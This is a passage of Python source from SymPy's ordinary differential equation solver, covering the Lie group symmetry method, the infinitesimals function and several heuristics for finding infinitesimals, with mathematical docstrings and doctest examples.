>>> pprint(dsolve(Eq(f(x)*f(x).diff(x) + x, 3*x*f(x)**2), f(x),
... hint='separable', simplify=False))
/ 2 \ 2
log\3*f (x) - 1/ x
---------------- = C1 + --
6 2
References
==========
- M. Tenenbaum & H. Pollard, "Ordinary Differential Equations",
Dover 1963, pp. 52
# indirect doctest
"""
x = func.args[0]
f = func.func
C1 = get_numbered_constants(eq, num=1)
r = match # {'m1':m1, 'm2':m2, 'y':y}
u = r.get('hint', f(x)) # get u from separable_reduced else get f(x)
return Eq(Integral(r['m2']['coeff']*r['m2'][r['y']]/r['m1'][r['y']],
(r['y'], None, u)), Integral(-r['m1']['coeff']*r['m1'][x]/
r['m2'][x], x) + C1)
def checkinfsol(eq, infinitesimals, func=None, order=None):
r"""
This function is used to check if the given infinitesimals are the
actual infinitesimals of the given first order differential equation.
This method is specific to the Lie Group Solver of ODEs.
As of now, it simply checks, by substituting the infinitesimals in the
partial differential equation.
.. math:: \frac{\partial \eta}{\partial x} + \left(\frac{\partial \eta}{\partial y}
- \frac{\partial \xi}{\partial x}\right)*h
- \frac{\partial \xi}{\partial y}*h^{2}
- \xi\frac{\partial h}{\partial x} - \eta\frac{\partial h}{\partial y} = 0
where `\eta`, and `\xi` are the infinitesimals and `h(x,y) = \frac{dy}{dx}`
The infinitesimals should be given in the form of a list of dicts
``[{xi(x, y): inf, eta(x, y): inf}]``, corresponding to the
output of the function infinitesimals. It returns a list
of values of the form ``[(True/False, sol)]`` where ``sol`` is the value
obtained after substituting the infinitesimals in the PDE. If it
is ``True``, then ``sol`` would be 0.
"""
if isinstance(eq, Equality):
eq = eq.lhs - eq.rhs
if not func:
eq, func = _preprocess(eq)
variables = func.args
if len(variables) != 1:
raise ValueError("ODE's have only one independent variable")
else:
x = variables[0]
if not order:
order = ode_order(eq, func)
if order != 1:
raise NotImplementedError("Lie groups solver has been implemented "
"only for first order differential equations")
else:
df = func.diff(x)
a = Wild('a', exclude = [df])
b = Wild('b', exclude = [df])
match = collect(expand(eq), df).match(a*df + b)
if match:
h = -simplify(match[b]/match[a])
else:
try:
sol = solve(eq, df)
except NotImplementedError:
raise NotImplementedError("Infinitesimals for the "
"first order ODE could not be found")
else:
h = sol[0] # Find infinitesimals for one solution
y = Dummy('y')
h = h.subs(func, y)
xi = Function('xi')(x, y)
eta = Function('eta')(x, y)
dxi = Function('xi')(x, func)
deta = Function('eta')(x, func)
pde = (eta.diff(x) + (eta.diff(y) - xi.diff(x))*h -
(xi.diff(y))*h**2 - xi*(h.diff(x)) - eta*(h.diff(y)))
soltup = []
for sol in infinitesimals:
tsol = {xi: S(sol[dxi]).subs(func, y),
eta: S(sol[deta]).subs(func, y)}
sol = simplify(pde.subs(tsol).doit())
if sol:
soltup.append((False, sol.subs(y, func)))
else:
soltup.append((True, 0))
return soltup
def _ode_lie_group_try_heuristic(eq, heuristic, func, match, inf):
xi = Function("xi")
eta = Function("eta")
f = func.func
x = func.args[0]
y = match['y']
h = match['h']
tempsol = []
if not inf:
try:
inf = infinitesimals(eq, hint=heuristic, func=func, order=1, match=match)
except ValueError:
return None
for infsim in inf:
xiinf = (infsim[xi(x, func)]).subs(func, y)
etainf = (infsim[eta(x, func)]).subs(func, y)
# This condition creates recursion while using pdsolve.
# Since the first step while solving a PDE of form
# a*(f(x, y).diff(x)) + b*(f(x, y).diff(y)) + c = 0
# is to solve the ODE dy/dx = b/a
if simplify(etainf/xiinf) == h:
continue
rpde = f(x, y).diff(x)*xiinf + f(x, y).diff(y)*etainf
r = pdsolve(rpde, func=f(x, y)).rhs
s = pdsolve(rpde - 1, func=f(x, y)).rhs
newcoord = [_lie_group_remove(coord) for coord in [r, s]]
r = Dummy("r")
s = Dummy("s")
C1 = Symbol("C1")
rcoord = newcoord[0]
scoord = newcoord[-1]
try:
sol = solve([r - rcoord, s - scoord], x, y, dict=True)
if sol == []:
continue
except NotImplementedError:
continue
else:
sol = sol[0]
xsub = sol[x]
ysub = sol[y]
num = simplify(scoord.diff(x) + scoord.diff(y)*h)
denom = simplify(rcoord.diff(x) + rcoord.diff(y)*h)
if num and denom:
diffeq = simplify((num/denom).subs([(x, xsub), (y, ysub)]))
sep = separatevars(diffeq, symbols=[r, s], dict=True)
if sep:
# Trying to separate, r and s coordinates
deq = integrate((1/sep[s]), s) + C1 - integrate(sep['coeff']*sep[r], r)
# Substituting and reverting back to original coordinates
deq = deq.subs([(r, rcoord), (s, scoord)])
try:
sdeq = solve(deq, y)
except NotImplementedError:
tempsol.append(deq)
else:
return [Eq(f(x), sol) for sol in sdeq]
elif denom: # (ds/dr) is zero which means s is constant
return [Eq(f(x), solve(scoord - C1, y)[0])]
elif num: # (dr/ds) is zero which means r is constant
return [Eq(f(x), solve(rcoord - C1, y)[0])]
# If nothing works, return solution as it is, without solving for y
if tempsol:
return [Eq(sol.subs(y, f(x)), 0) for sol in tempsol]
return None
def _ode_lie_group( s, func, order, match):
heuristics = lie_heuristics
inf = {}
f = func.func
x = func.args[0]
df = func.diff(x)
xi = Function("xi")
eta = Function("eta")
xis = match['xi']
etas = match['eta']
y = match.pop('y', None)
if y:
h = -simplify(match[match['d']]/match[match['e']])
y = y
else:
y = Dummy("y")
h = s.subs(func, y)
if xis is not None and etas is not None:
inf = [{xi(x, f(x)): S(xis), eta(x, f(x)): S(etas)}]
if checkinfsol(Eq(df, s), inf, func=f(x), order=1)[0][0]:
heuristics = ["user_defined"] + list(heuristics)
match = {'h': h, 'y': y}
# This is done so that if any heuristic raises a ValueError
# another heuristic can be used.
sol = None
for heuristic in heuristics:
sol = _ode_lie_group_try_heuristic(Eq(df, s), heuristic, func, match, inf)
if sol:
return sol
return sol
def ode_lie_group(eq, func, order, match):
r"""
This hint implements the Lie group method of solving first order differential
equations. The aim is to convert the given differential equation from the
given coordinate system into another coordinate system where it becomes
invariant under the one-parameter Lie group of translations. The converted
ODE can be easily solved by quadrature. It makes use of the
:py:meth:`sympy.solvers.ode.infinitesimals` function which returns the
infinitesimals of the transformation.
The coordinates `r` and `s` can be found by solving the following Partial
Differential Equations.
.. math :: \xi\frac{\partial r}{\partial x} + \eta\frac{\partial r}{\partial y}
= 0
.. math :: \xi\frac{\partial s}{\partial x} + \eta\frac{\partial s}{\partial y}
= 1
The differential equation becomes separable in the new coordinate system
.. math :: \frac{ds}{dr} = \frac{\frac{\partial s}{\partial x} +
h(x, y)\frac{\partial s}{\partial y}}{
\frac{\partial r}{\partial x} + h(x, y)\frac{\partial r}{\partial y}}
After finding the solution by integration, it is then converted back to the original
coordinate system by substituting `r` and `s` in terms of `x` and `y` again.
Examples
========
>>> from sympy import Function, dsolve, exp, pprint
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(f(x).diff(x) + 2*x*f(x) - x*exp(-x**2), f(x),
... hint='lie_group'))
/ 2\ 2
| x | -x
f(x) = |C1 + --|*e
\ 2 /
References
==========
- Solving differential equations by Symmetry Groups,
John Starrett, pp. 1 - pp. 14
"""
x = func.args[0]
df = func.diff(x)
try:
eqsol = solve(eq, df)
except NotImplementedError:
eqsol = []
desols = []
for s in eqsol:
sol = _ode_lie_group(s, func, order, match=match)
if sol:
desols.extend(sol)
if desols == []:
raise NotImplementedError("The given ODE " + str(eq) + " cannot be solved by"
+ " the lie group method")
return desols
def _lie_group_remove(coords):
r"""
This function is strictly meant for internal use by the Lie group ODE solving
method. It replaces arbitrary functions returned by pdsolve as follows:
1] If coords is an arbitrary function, then its argument is returned.
2] An arbitrary function in an Add object is replaced by zero.
3] An arbitrary function in a Mul object is replaced by one.
4] If there is no arbitrary function coords is returned unchanged.
Examples
========
>>> from sympy.solvers.ode.ode import _lie_group_remove
>>> from sympy import Function
>>> from sympy.abc import x, y
>>> F = Function("F")
>>> eq = x**2*y
>>> _lie_group_remove(eq)
x**2*y
>>> eq = F(x**2*y)
>>> _lie_group_remove(eq)
x**2*y
>>> eq = x*y**2 + F(x**3)
>>> _lie_group_remove(eq)
x*y**2
>>> eq = (F(x**3) + y)*x**4
>>> _lie_group_remove(eq)
x**4*y
"""
if isinstance(coords, AppliedUndef):
return coords.args[0]
elif coords.is_Add:
subfunc = coords.atoms(AppliedUndef)
if subfunc:
for func in subfunc:
coords = coords.subs(func, 0)
return coords
elif coords.is_Pow:
base, expr = coords.as_base_exp()
base = _lie_group_remove(base)
expr = _lie_group_remove(expr)
return base**expr
elif coords.is_Mul:
mulargs = []
coordargs = coords.args
for arg in coordargs:
if not isinstance(coords, AppliedUndef):
mulargs.append(_lie_group_remove(arg))
return Mul(*mulargs)
return coords
def infinitesimals(eq, func=None, order=None, hint='default', match=None):
r"""
The infinitesimal functions of an ordinary differential equation, `\xi(x,y)`
and `\eta(x,y)`, are the infinitesimals of the Lie group of point transformations
for which the differential equation is invariant. So, the ODE `y'=f(x,y)`
would admit a Lie group `x^*=X(x,y;\varepsilon)=x+\varepsilon\xi(x,y)`,
`y^*=Y(x,y;\varepsilon)=y+\varepsilon\eta(x,y)` such that `(y^*)'=f(x^*, y^*)`.
A change of coordinates, to `r(x,y)` and `s(x,y)`, can be performed so this Lie group
becomes the translation group, `r^*=r` and `s^*=s+\varepsilon`.
They are tangents to the coordinate curves of the new system.
Consider the transformation `(x, y) \to (X, Y)` such that the
differential equation remains invariant. `\xi` and `\eta` are the tangents to
the transformed coordinates `X` and `Y`, at `\varepsilon=0`.
.. math:: \left(\frac{\partial X(x,y;\varepsilon)}{\partial\varepsilon
}\right)|_{\varepsilon=0} = \xi,
\left(\frac{\partial Y(x,y;\varepsilon)}{\partial\varepsilon
}\right)|_{\varepsilon=0} = \eta,
The infinitesimals can be found by solving the following PDE:
>>> from sympy import Function, Eq, pprint
>>> from sympy.abc import x, y
>>> xi, eta, h = map(Function, ['xi', 'eta', 'h'])
>>> h = h(x, y) # dy/dx = h
>>> eta = eta(x, y)
>>> xi = xi(x, y)
>>> genform = Eq(eta.diff(x) + (eta.diff(y) - xi.diff(x))*h
... - (xi.diff(y))*h**2 - xi*(h.diff(x)) - eta*(h.diff(y)), 0)
>>> pprint(genform)
/d d \ d 2 d
|--(eta(x, y)) - --(xi(x, y))|*h(x, y) - eta(x, y)*--(h(x, y)) - h (x, y)*--(x
\dy dx / dy dy
<BLANKLINE>
d d
i(x, y)) - xi(x, y)*--(h(x, y)) + --(eta(x, y)) = 0
dx dx
Solving the above mentioned PDE is not trivial, and can be solved only by
making intelligent assumptions for `\xi` and `\eta` (heuristics). Once an
infinitesimal is found, the attempt to find more heuristics stops. This is done to
optimise the speed of solving the differential equation. If a list of all the
infinitesimals is needed, ``hint`` should be flagged as ``all``, which gives
the complete list of infinitesimals. If the infinitesimals for a particular
heuristic needs to be found, it can be passed as a flag to ``hint``.
Examples
========
>>> from sympy import Function
>>> from sympy.solvers.ode.ode import infinitesimals
>>> from sympy.abc import x
>>> f = Function('f')
>>> eq = f(x).diff(x) - x**2*f(x)
>>> infinitesimals(eq)
[{eta(x, f(x)): exp(x**3/3), xi(x, f(x)): 0}]
References
==========
- Solving differential equations by Symmetry Groups,
John Starrett, pp. 1 - pp. 14
"""
if isinstance(eq, Equality):
eq = eq.lhs - eq.rhs
if not func:
eq, func = _preprocess(eq)
variables = func.args
if len(variables) != 1:
raise ValueError("ODE's have only one independent variable")
else:
x = variables[0]
if not order:
order = ode_order(eq, func)
if order != 1:
raise NotImplementedError("Infinitesimals for only "
"first order ODE's have been implemented")
else:
df = func.diff(x)
# Matching differential equation of the form a*df + b
a = Wild('a', exclude = [df])
b = Wild('b', exclude = [df])
if match: # Used by lie_group hint
h = match['h']
y = match['y']
else:
match = collect(expand(eq), df).match(a*df + b)
if match:
h = -simplify(match[b]/match[a])
else:
try:
sol = solve(eq, df)
except NotImplementedError:
raise NotImplementedError("Infinitesimals for the "
"first order ODE could not be found")
else:
h = sol[0] # Find infinitesimals for one solution
y = Dummy("y")
h = h.subs(func, y)
u = Dummy("u")
hx = h.diff(x)
hy = h.diff(y)
hinv = ((1/h).subs([(x, u), (y, x)])).subs(u, y) # Inverse ODE
match = {'h': h, 'func': func, 'hx': hx, 'hy': hy, 'y': y, 'hinv': hinv}
if hint == 'all':
xieta = []
for heuristic in lie_heuristics:
function = globals()['lie_heuristic_' + heuristic]
inflist = function(match, comp=True)
if inflist:
xieta.extend([inf for inf in inflist if inf not in xieta])
if xieta:
return xieta
else:
raise NotImplementedError("Infinitesimals could not be found for "
"the given ODE")
elif hint == 'default':
for heuristic in lie_heuristics:
function = globals()['lie_heuristic_' + heuristic]
xieta = function(match, comp=False)
if xieta:
return xieta
raise NotImplementedError("Infinitesimals could not be found for"
" the given ODE")
elif hint not in lie_heuristics:
raise ValueError("Heuristic not recognized: " + hint)
else:
function = globals()['lie_heuristic_' + hint]
xieta = function(match, comp=True)
if xieta:
return xieta
else:
raise ValueError("Infinitesimals could not be found using the"
" given heuristic")
def lie_heuristic_abaco1_simple(match, comp=False):
r"""
The first heuristic uses the following four sets of
assumptions on `\xi` and `\eta`
.. math:: \xi = 0, \eta = f(x)
.. math:: \xi = 0, \eta = f(y)
.. math:: \xi = f(x), \eta = 0
.. math:: \xi = f(y), \eta = 0
The success of this heuristic is determined by algebraic factorisation.
For the first assumption `\xi = 0` and `\eta` to be a function of `x`, the PDE
.. math:: \frac{\partial \eta}{\partial x} + (\frac{\partial \eta}{\partial y}
- \frac{\partial \xi}{\partial x})*h
- \frac{\partial \xi}{\partial y}*h^{2}
- \xi*\frac{\partial h}{\partial x} - \eta*\frac{\partial h}{\partial y} = 0
reduces to `f'(x) - f\frac{\partial h}{\partial y} = 0`
If `\frac{\partial h}{\partial y}` is a function of `x`, then this can usually
be integrated easily. A similar idea is applied to the other 3 assumptions as well.
References
==========
- E.S Cheb-Terrab, L.G.S Duarte and L.A,C.P da Mota, Computer Algebra
Solving of First Order ODEs Using Symmetry Methods, pp. 8
"""
xieta = []
y = match['y']
h = match['h']
func = match['func']
x = func.args[0]
hx = match['hx']
hy = match['hy']
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
hysym = hy.free_symbols
if y not in hysym:
try:
fx = exp(integrate(hy, x))
except NotImplementedError:
pass
else:
inf = {xi: S.Zero, eta: fx}
if not comp:
return [inf]
if comp and inf not in xieta:
xieta.append(inf)
factor = hy/h
facsym = factor.free_symbols
if x not in facsym:
try:
fy = exp(integrate(factor, y))
except NotImplementedError:
pass
else:
inf = {xi: S.Zero, eta: fy.subs(y, func)}
if not comp:
return [inf]
if comp and inf not in xieta:
xieta.append(inf)
factor = -hx/h
facsym = factor.free_symbols
if y not in facsym:
try:
fx = exp(integrate(factor, x))
except NotImplementedError:
pass
else:
inf = {xi: fx, eta: S.Zero}
if not comp:
return [inf]
if comp and inf not in xieta:
xieta.append(inf)
factor = -hx/(h**2)
facsym = factor.free_symbols
if x not in facsym:
try:
fy = exp(integrate(factor, y))
except NotImplementedError:
pass
else:
inf = {xi: fy.subs(y, func), eta: S.Zero}
if not comp:
return [inf]
if comp and inf not in xieta:
xieta.append(inf)
if xieta:
return xieta
def lie_heuristic_abaco1_product(match, comp=False):
r"""
The second heuristic uses the following two assumptions on `\xi` and `\eta`
.. math:: \eta = 0, \xi = f(x)*g(y)
.. math:: \eta = f(x)*g(y), \xi = 0
The first assumption of this heuristic holds good if
`\frac{1}{h^{2}}\frac{\partial^2}{\partial x \partial y}\log(h)` is
separable in `x` and `y`, then the separated factors containing `x`
is `f(x)`, and `g(y)` is obtained by
.. math:: e^{\int f\frac{\partial}{\partial x}\left(\frac{1}{f*h}\right)\,dy}
provided `f\frac{\partial}{\partial x}\left(\frac{1}{f*h}\right)` is a function
of `y` only.
The second assumption holds good if `\frac{dy}{dx} = h(x, y)` is rewritten as
`\frac{dy}{dx} = \frac{1}{h(y, x)}` and the same properties of the first assumption
satisfies. After obtaining `f(x)` and `g(y)`, the coordinates are again
interchanged, to get `\eta` as `f(x)*g(y)`
References
==========
- E.S. Cheb-Terrab, A.D. Roche, Symmetries and First Order
ODE Patterns, pp. 7 - pp. 8
"""
xieta = []
y = match['y']
h = match['h']
hinv = match['hinv']
func = match['func']
x = func.args[0]
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
inf = separatevars(((log(h).diff(y)).diff(x))/h**2, dict=True, symbols=[x, y])
if inf and inf['coeff']:
fx = inf[x]
gy = simplify(fx*((1/(fx*h)).diff(x)))
gysyms = gy.free_symbols
if x not in gysyms:
gy = exp(integrate(gy, y))
inf = {eta: S.Zero, xi: (fx*gy).subs(y, func)}
if not comp:
return [inf]
if comp and inf not in xieta:
xieta.append(inf)
u1 = Dummy("u1")
inf = separatevars(((log(hinv).diff(y)).diff(x))/hinv**2, dict=True, symbols=[x, y])
if inf and inf['coeff']:
fx = inf[x]
gy = simplify(fx*((1/(fx*hinv)).diff(x)))
gysyms = gy.free_symbols
if x not in gysyms:
gy = exp(integrate(gy, y))
etaval = fx*gy
etaval = (etaval.subs([(x, u1), (y, x)])).subs(u1, y)
inf = {eta: etaval.subs(y, func), xi: S.Zero}
if not comp:
return [inf]
if comp and inf not in xieta:
xieta.append(inf)
if xieta:
return xieta
def lie_heuristic_bivariate(match, comp=False):
r"""
The third heuristic assumes the infinitesimals `\xi` and `\eta`
to be bi-variate polynomials in `x` and `y`. The assumption made here
for the logic below is that `h` is a rational function in `x` and `y`
though that may not be necessary for the infinitesimals to be
bivariate polynomials. The coefficients of the infinitesimals
are found out by substituting them in the PDE and grouping similar terms
that are polynomials and since they form a linear system, solve and check
for non trivial solutions. The degree of the assumed bivariates
are increased till a certain maximum value.
References
==========
- Lie Groups and Differential Equations
pp. 327 - pp. 329
"""
h = match['h']
hx = match['hx']
hy = match['hy']
func = match['func']
x = func.args[0]
y = match['y']
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
if h.is_rational_function():
# The maximum degree that the infinitesimals can take is
# calculated by this technique.
etax, etay, etad, xix, xiy, xid = symbols("etax etay etad xix xiy xid")
ipde = etax + (etay - xix)*h - xiy*h**2 - xid*hx - etad*hy
num, denom = cancel(ipde).as_numer_denom()
deg = Poly(num, x, y).total_degree()
deta = Function('deta')(x, y)
dxi = Function('dxi')(x, y)
ipde = (deta.diff(x) + (deta.diff(y) - dxi.diff(x))*h - (dxi.diff(y))*h**2
- dxi*hx - deta*hy)
xieq = Symbol("xi0")
etaeq = Symbol("eta0")
for i in range(deg + 1):
if i:
xieq += Add(*[
Symbol("xi_" + str(power) + "_" + str(i - power))*x**power*y**(i - power)
for power in range(i + 1)])
etaeq += Add(*[
Symbol("eta_" + str(power) + "_" + str(i - power))*x**power*y**(i - power)
for power in range(i + 1)])
pden, denom = (ipde.subs({dxi: xieq, deta: etaeq}).doit()).as_numer_denom()
pden = expand(pden)
# If the individual terms are monomials, the coefficients
# are grouped
if pden.is_polynomial(x, y) and pden.is_Add:
polyy = Poly(pden, x, y).as_dict()
if polyy:
symset = xieq.free_symbols.union(etaeq.free_symbols) - {x, y}
soldict = solve(polyy.values(), *symset)
if isinstance(soldict, list):
soldict = soldict[0]
if any(soldict.values()):
xired = xieq.subs(soldict)
etared = etaeq.subs(soldict)
# Scaling is done by substituting one for the parameters
# This can be any number except zero.
dict_ = dict((sym, 1) for sym in symset)
inf = {eta: etared.subs(dict_).subs(y, func),
xi: xired.subs(dict_).subs(y, func)}
return [inf]
def lie_heuristic_chi(match, comp=False):
r"""
The aim of the fourth heuristic is to find the function `\chi(x, y)`
that satisfies the PDE `\frac{d\chi}{dx} + h\frac{d\chi}{dx}
- \frac{\partial h}{\partial y}\chi = 0`.
This assumes `\chi` to be a bivariate polynomial in `x` and `y`. By intuition,
`h` should be a rational function in `x` and `y`. The method used here is
to substitute a general binomial for `\chi` up to a certain maximum degree
is reached. The coefficients of the polynomials, are calculated by by collecting
terms of the same order in `x` and `y`.
After finding `\chi`, the next step is to use `\eta = \xi*h + \chi`, to
determine `\xi` and `\eta`. This can be done by dividing `\chi` by `h`
which would give `-\xi` as the quotient and `\eta` as the remainder.
References
==========
- E.S Cheb-Terrab, L.G.S Duarte and L.A,C.P da Mota, Computer Algebra
Solving of First Order ODEs Using Symmetry Methods, pp. 8
"""
h = match['h']
hy = match['hy']
func = match['func']
x = func.args[0]
y = match['y']
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
if h.is_rational_function():
schi, schix, schiy = symbols("schi, schix, schiy")
cpde = schix + h*schiy - hy*schi
num, denom = cancel(cpde).as_numer_denom()
deg = Poly(num, x, y).total_degree()
chi = Function('chi')(x, y)
chix = chi.diff(x)
chiy = chi.diff(y)
cpde = chix + h*chiy - hy*chi
chieq = Symbol("chi")
for i in range(1, deg + 1):
chieq += Add(*[
Symbol("chi_" + str(power) + "_" + str(i - power))*x**power*y**(i - power)
for power in range(i + 1)])
cnum, cden = cancel(cpde.subs({chi : chieq}).doit()).as_numer_denom()
cnum = expand(cnum)
if cnum.is_polynomial(x, y) and cnum.is_Add:
cpoly = Poly(cnum, x, y).as_dict()
if cpoly:
solsyms = chieq.free_symbols - {x, y}
soldict = solve(cpoly.values(), *solsyms)
if isinstance(soldict, list):
soldict = soldict[0]
if any(soldict.values()):
chieq = chieq.subs(soldict)
dict_ = dict((sym, 1) for sym in solsyms)
chieq = chieq.subs(dict_)
# After finding chi, the main aim is to find out
# eta, xi by the equation eta = xi*h + chi
# One method to set xi, would be rearranging it to
# (eta/h) - xi = (chi/h). This would mean dividing
# chi by h would give -xi as the quotient and eta
# as the remainder. Thanks to Sean Vig for suggesting
# this method.
xic, etac = div(chieq, h)
inf = {eta: etac.subs(y, func), xi: -xic.subs(y, func)}
return [inf]
def lie_heuristic_function_sum(match, comp=False):
r"""
This heuristic uses the following two assumptions on `\xi` and `\eta`
.. math:: \eta = 0, \xi = f(x) + g(y)
.. math:: \eta = f(x) + g(y), \xi = 0
The first assumption of this heuristic holds good if
.. math:: \frac{\partial}{\partial y}[(h\frac{\partial^{2}}{
\partial x^{2}}(h^{-1}))^{-1}]
is separable in `x` and `y`,
1. The separated factors containing `y` is `\frac{\partial g}{\partial y}`.
From this `g(y)` can be determined.
2. The separated factors containing `x` is `f''(x)`.
3. `h\frac{\partial^{2}}{\partial x^{2}}(h^{-1})` equals
`\frac{f''(x)}{f(x) + g(y)}`. From this `f(x)` can be determined.
The second assumption holds good if `\frac{dy}{dx} = h(x, y)` is rewritten as
`\frac{dy}{dx} = \frac{1}{h(y, x)}` and the same properties of the first
assumption satisfies. After obtaining `f(x)` and `g(y)`, the coordinates
are again interchanged, to get `\eta` as `f(x) + g(y)`.
For both assumptions, the constant factors are separated among `g(y)`
and `f''(x)`, such that `f''(x)` obtained from 3] is the same as that
obtained from 2]. If not possible, then this heuristic fails.
References
==========
- E.S. Cheb-Terrab, A.D. Roche, Symmetries and First Order
ODE Patterns, pp. 7 - pp. 8
"""
xieta = []
h = match['h']
func = match['func']
hinv = match['hinv']
x = func.args[0]
y = match['y']
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
for odefac in [h, hinv]:
factor = odefac*((1/odefac).diff(x, 2))
sep = separatevars((1/factor).diff(y), dict=True, symbols=[x, y])
if sep and sep['coeff'] and sep[x].has(x) and sep[y].has(y):
k = Dummy("k")
try:
gy = k*integrate(sep[y], y)
except NotImplementedError:
pass
else:
fdd = 1/(k*sep[x]*sep['coeff'])
fx = simplify(fdd/factor - gy)
check = simplify(fx.diff(x, 2) - fdd)
if fx:
if not check:
fx = fx.subs(k, 1)
gy = (gy/k)
else:
sol = solve(check, k)
if sol:
sol = sol[0]
fx = fx.subs(k, sol)
gy = (gy/k)*sol
else:
continue
if odefac == hinv: # Inverse ODE
fx = fx.subs(x, y)
gy = gy.subs(y, x)
etaval = factor_terms(fx + gy)
if etaval.is_Mul:
etaval = Mul(*[arg for arg in etaval.args if arg.has(x, y)])
if odefac == hinv: # Inverse ODE
inf = {eta: etaval.subs(y, func), xi : S.Zero}
else:
inf = {xi: etaval.subs(y, func), eta : S.Zero}
if not comp:
return [inf]
else:
xieta.append(inf)
if xieta:
return xieta
def lie_heuristic_abaco2_similar(match, comp=False):
r"""
This heuristic uses the following two assumptions on `\xi` and `\eta`
.. math:: \eta = g(x), \xi = f(x)
.. math:: \eta = f(y), \xi = g(y)
For the first assumption,
1. First `\frac{\frac{\partial h}{\partial y}}{\frac{\partial^{2} h}{
\partial yy}}` is calculated. Let us say this value is A
2. If this is constant, then `h` is matched to the form `A(x) + B(x)e^{
\frac{y}{C}}` then, `\frac{e^{\int \frac{A(x)}{C} \,dx}}{B(x)}` gives `f(x)`
and `A(x)*f(x)` gives `g(x)`
3. Otherwise `\frac{\frac{\partial A}{\partial X}}{\frac{\partial A}{
\partial Y}} = \gamma` is calculated. If
a] `\gamma` is a function of `x` alone
b] `\frac{\gamma\frac{\partial h}{\partial y} - \gamma'(x) - \frac{
\partial h}{\partial x}}{h + \gamma} = G` is a function of `x` alone.
then, `e^{\int G \,dx}` gives `f(x)` and `-\gamma*f(x)` gives `g(x)`
The second assumption holds good if `\frac{dy}{dx} = h(x, y)` is rewritten as
`\frac{dy}{dx} = \frac{1}{h(y, x)}` and the same properties of the first assumption
satisfies. After obtaining `f(x)` and `g(x)`, the coordinates are again
interchanged, to get `\xi` as `f(x^*)` and `\eta` as `g(y^*)`
References
==========
- E.S. Cheb-Terrab, A.D. Roche, Symmetries and First Order
ODE Patterns, pp. 10 - pp. 12
"""
h = match['h']
hx = match['hx']
hy = match['hy']
func = match['func']
hinv = match['hinv']
x = func.args[0]
y = match['y']
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
factor = cancel(h.diff(y)/h.diff(y, 2))
factorx = factor.diff(x)
factory = factor.diff(y)
if not factor.has(x) and not factor.has(y):
A = Wild('A', exclude=[y])
B = Wild('B', exclude=[y])
C = Wild('C', exclude=[x, y])
match = h.match(A + B*exp(y/C))
try:
tau = exp(-integrate(match[A]/match[C]), x)/match[B]
except NotImplementedError:
pass
else:
gx = match[A]*tau
return [{xi: tau, eta: gx}]
else:
gamma = cancel(factorx/factory)
if not gamma.has(y):
tauint = cancel((gamma*hy - gamma.diff(x) - hx)/(h + gamma))
if not tauint.has(y):
try:
tau = exp(integrate(tauint, x))
except NotImplementedError:
pass
else:
gx = -tau*gamma
return [{xi: tau, eta: gx}]
factor = cancel(hinv.diff(y)/hinv.diff(y, 2))
factorx = factor.diff(x)
factory = factor.diff(y)
if not factor.has(x) and not factor.has(y):
A = Wild('A', exclude=[y])
B = Wild('B', exclude=[y])
C = Wild('C', exclude=[x, y])
match = h.match(A + B*exp(y/C))
try:
tau = exp(-integrate(match[A]/match[C]), x)/match[B]
except NotImplementedError:
pass
else:
gx = match[A]*tau
return [{eta: tau.subs(x, func), xi: gx.subs(x, func)}]
else:
gamma = cancel(factorx/factory)
if not gamma.has(y):
tauint = cancel((gamma*hinv.diff(y) - gamma.diff(x) - hinv.diff(x))/(
hinv + gamma))
if not tauint.has(y):
try:
tau = exp(integrate(tauint, x))
except NotImplementedError:
pass
else:
gx = -tau*gamma
return [{eta: tau.subs(x, func), xi: gx.subs(x, func)}]
def lie_heuristic_abaco2_unique_unknown(match, comp=False):
r"""
This heuristic assumes the presence of unknown functions or known functions
with non-integer powers.
1. A list of all functions and non-integer powers containing x and y
2. Loop over each element `f` in the list, find `\frac{\frac{\partial f}{\partial x}}{
\frac{\partial f}{\partial x}} = R`
If it is separable in `x` and `y`, let `X` be the factors containing `x`. Then
a] Check if `\xi = X` and `\eta = -\frac{X}{R}` satisfy the PDE. If yes, then return
`\xi` and `\eta`
b] Check if `\xi = \frac{-R}{X}` and `\eta = -\frac{1}{X}` satisfy the PDE.
If yes, then return `\xi` and `\eta`
If not, then check if
a] :math:`\xi = -R,\eta = 1`
b] :math:`\xi = 1, \eta = -\frac{1}{R}`
are solutions.
References
==========
- E.S. Cheb-Terrab, A.D. Roche, Symmetries and First Order
ODE Patterns, pp. 10 - pp. 12
"""
h = match['h']
hx = match['hx']
hy = match['hy']
func = match['func']
x = func.args[0]
y = match['y']
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
funclist = []
for atom in h.atoms(Pow):
base, exp = atom.as_base_exp()
if base.has(x) and base.has(y):
if not exp.is_Integer:
funclist.append(atom)
for function in h.atoms(AppliedUndef):
syms = function.free_symbols
if x in syms and y in syms:
funclist.append(function)
for f in funclist:
frac = cancel(f.diff(y)/f.diff(x))
sep = separatevars(frac, dict=True, symbols=[x, y])
if sep and sep['coeff']:
xitry1 = sep[x]
etatry1 = -1/(sep[y]*sep['coeff'])
pde1 = etatry1.diff(y)*h - xitry1.diff(x)*h - xitry1*hx - etatry1*hy
if not simplify(pde1):
return [{xi: xitry1, eta: etatry1.subs(y, func)}]
xitry2 = 1/etatry1
etatry2 = 1/xitry1
pde2 = etatry2.diff(x) - (xitry2.diff(y))*h**2 - xitry2*hx - etatry2*hy
if not simplify(expand(pde2)):
return [{xi: xitry2.subs(y, func), eta: etatry2}]
else:
etatry = -1/frac
pde = etatry.diff(x) + etatry.diff(y)*h - hx - etatry*hy
if not simplify(pde):
return [{xi: S.One, eta: etatry.subs(y, func)}]
xitry = -frac
pde = -xitry.diff(x)*h -xitry.diff(y)*h**2 - xitry*hx -hy
if not simplify(expand(pde)):
return [{xi: xitry.subs(y, func), eta: S.One}]
def lie_heuristic_abaco2_unique_general(match, comp=False):
r"""
This heuristic finds if infinitesimals of the form `\eta = f(x)`, `\xi = g(y)`
without making any assumptions on `h`.
The complete sequence of steps is given in the paper mentioned below.
References
==========
- E.S. Cheb-Terrab, A.D. Roche, Symmetries and First Order
ODE Patterns, pp. 10 - pp. 12
"""
hx = match['hx']
hy = match['hy']
func = match['func']
x = func.args[0]
y = match['y']
xi = Function('xi')(x, func)
eta = Function('eta')(x, func)
A = hx.diff(y)
